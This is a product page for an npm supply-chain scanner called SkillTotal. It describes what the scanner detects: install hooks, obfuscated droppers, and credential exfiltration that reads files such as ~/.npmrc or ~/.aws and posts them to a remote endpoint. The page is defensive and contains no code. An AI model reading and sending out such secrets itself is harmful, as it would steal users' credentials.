← Back to home
Scan npm packages for supply-chain risk
npm packages can run code the moment you install them. Type npm:<package> and see install hooks, network calls, and obfuscated payloads — with evidence — before you add a dependency.
Scan a component — free →What it looks for in npm packages
- Install-time execution: pre/post/install lifecycle hooks in package.json — the classic supply-chain entry point.
- Obfuscated droppers: decode-and-execute chains (base64/hex) and dynamic code execution that fetch and run a second stage.
- Credential exfiltration: reading
~/.npmrc,~/.aws, or env secrets and POSTing them to a remote endpoint (flagged as a critical sensitive-data-plus-network combination).
Capability is not risk
Plenty of legitimate packages use the filesystem and network. SkillTotal scores deliberate malicious indicators, lists powerful capabilities separately, and anchors every confirmed finding to a file and line — so a normal dependency is not flagged as malware.
FAQ
- Can I scan a specific version?
- Yes — use npm:<package>@<version>. Without a version the latest published release is analyzed.
- Does it cover postinstall scripts?
- Yes. Install-time lifecycle hooks are a first-class detection, since they execute automatically on install.
- Is my input or the package uploaded anywhere?
- The package is fetched from the public registry and analyzed statically — never executed, never sent to an LLM.